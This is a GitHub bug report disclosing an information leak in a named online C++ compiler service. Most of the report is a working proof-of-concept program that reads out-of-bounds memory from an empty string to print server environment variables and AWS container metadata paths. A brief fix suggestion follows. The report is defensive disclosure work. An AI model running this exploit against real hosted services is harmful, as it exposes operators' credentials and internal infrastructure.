Bug Report: Information Leakage in C++ Compiler

Summary:
Online C++ IDE allows OOB vulnerability that attacker to gain server env variables & internal server information - such as NVM_INSTALL_PATH, ECS_CONTAINER_METADATA_URI_V4, etc.

Affected Domain:
[https://onecompiler.com/cpp](https://github.com/onecompiler/community/issues/url)

Severity:
High

Steps to reproduce:
Go to - [https://onecompiler.com/cpp](https://github.com/onecompiler/community/issues/url)
Enter the given code below and execute it.
Impact:
Allowed to access out of bound memory in an online compiler, leading to leakage of environment variables and system paths. As an attacker, sensitive AWS instance metadata and internal system information were exposed through memory disclosure.

PoC:
```
#include <string>
#include <iostream>
#include <cctype>
using namespace std;

int main(void) {

    string str = ""; 
    int idx = 0;

    while (str[idx] != '*') { 
        if (isprint(str[idx])) { 
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != '_') { 
        if (isprint(str[idx])) {
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != 'E') { 
        if (isprint(str[idx])) { 
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != '\0') { 
        if (isprint(str[idx])) {
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != '_') {  
        if (isprint(str[idx])) {  
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != 'P') {  
        if (isprint(str[idx])) {  
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != '0') {  
        if (isprint(str[idx])) { 
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != 'L') {  
        if (isprint(str[idx])) {  
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != 'E') {  
        if (isprint(str[idx])) {  
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != '/') {  
        if (isprint(str[idx])) {  
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != 'L') { 
        if (isprint(str[idx])) {  
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != '/') { 
        if (isprint(str[idx])) {  
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != 'E') { 
        if (isprint(str[idx])) { 
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != 'M') {  
        if (isprint(str[idx])) {  
            cout << str[idx];
        }
        idx++;
    }
    while (str[idx] != 'n') { 
        if (isprint(str[idx])) { 
            cout << str[idx];
        }
        idx++;
    }
    cout << endl;

    return 0;
}
```

Output:
![screenshot](https://github.com/user-attachments/assets/3f29606a-b29f-40f1-aed1-36481830e597)

Fix:
Block the abnormal memory access - using sandbox, addresssanitizer options

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Bug Report: Information Leakage in C++ Compiler #23

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Bug Report: Information Leakage in C++ Compiler #23

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions